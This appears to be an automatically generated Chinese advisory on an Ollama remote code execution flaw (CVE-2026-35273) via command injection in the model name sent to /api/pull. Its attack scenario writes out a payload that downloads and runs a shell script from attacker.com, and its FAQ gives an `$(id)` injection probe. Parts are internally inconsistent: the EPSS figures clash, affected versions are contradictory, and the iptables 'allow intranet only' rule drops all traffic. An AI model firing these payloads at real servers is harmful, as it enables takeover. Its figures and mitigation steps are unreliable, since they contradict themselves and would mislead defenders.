Exploit for CVE-2026-35273 exploit
CVE-2026-35273 是一个针对 Ollama 的严重远程代码执行漏洞,CVSS 9.8。攻击者可利用 API 输入验证缺陷在服务器上执行任意命令,进而完全控制系统。本文提供详细技术分析、攻击场景及修复建议。
Exploit for CVE-2026-35273 exploit
📋 漏洞概述
CVE-2026-35273 为 Ollama 远程代码执行漏洞,攻击者可利用特制请求在服务器上执行任意命令。
📋 基础信息
| 受影响版本 | Ollama < 0.17.1 (所有版本) |
| 漏洞类型 | 输入验证不当 |
| CVSS | 9.8 · Critical |
| CVE | CVE-2026-35273 |
🔬 漏洞根因
Ollama API 在处理模型拉取请求时,未对用户提供的模型名称进行充分过滤与校验。攻击者可通过构造包含命令注入载荷的模型名称(例如通过 Git 协议、路径穿越或特殊字符),导致服务器在调用底层下载工具或解析模型元数据时,将恶意字符串拼接至系统命令中执行。
🎯 攻击场景
1. 攻击者确定目标 Ollama 服务(默认 11434 端口)可公开访问或可通过 SSRF 触发; 2. 发送特制的 POST 请求至 /api/pull,其中 body 中 model 字段设置为包含反引号或 $(...) 命令替换的 payload,例如 `model: latest$(curl http://attacker.com/shell.sh | bash)`; 3. Ollama 服务端未正确转义该输入,直接将其拼接至下载命令(如 git clone 或 wget); 4. 服务器执行该恶意命令,下载并执行反向 Shell 脚本; 5. 攻击者获得服务器 shell 权限,实现完全控制。
💥 漏洞影响
攻击者可在未授权情况下远程执行任意系统命令,获得服务器控制权,进而窃取模型数据、横向移动、部署后门,影响所有暴露在公网或未正确隔离网络的 Ollama 服务。
🛡️ 修复建议
升级至 Ollama >= 0.17.1;临时缓解措施:配置防火墙仅允许受信任 IP 访问 Ollama 服务端口,并使用 API 网关对输入参数进行白名单验证。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-35273
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-35273
- 原始来源(Sploitus)
🚨 威胁评估
| 📈 EPSS 利用概率 | 低 (0.0%) (高于 7.3% 的漏洞) |
| 🚨 CISA KEV | 🚨 已被积极利用 关联勒索软件 |
| 🔧 公开 PoC | 2 个公开 PoC 仓库 |
⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-06-13 08:07 | 来源: Sploitus
🤖 常见问题解答(FAQ)
❓ 如何检测服务器是否存在此漏洞?
向 /api/pull 发送 POST,model 设为 `test:latest$(id)`,若返回包含 uid=... 的输出,则存在漏洞。更安全的方式是检查版本是否 >= 0.17.1。
❓ 漏洞利用是否需要身份认证?
不需要。Ollama 默认 API 无身份验证机制,攻击者可直接通过 HTTP 请求触发漏洞。
❓ 如果无法立即升级,有什么快速缓解措施?
使用 iptables 限制 11434 端口仅允许内网 IP 访问:`iptables -A INPUT -p tcp --dport 11434 -j DROP`,或在前置反向代理中增加输入 sanitization 规则。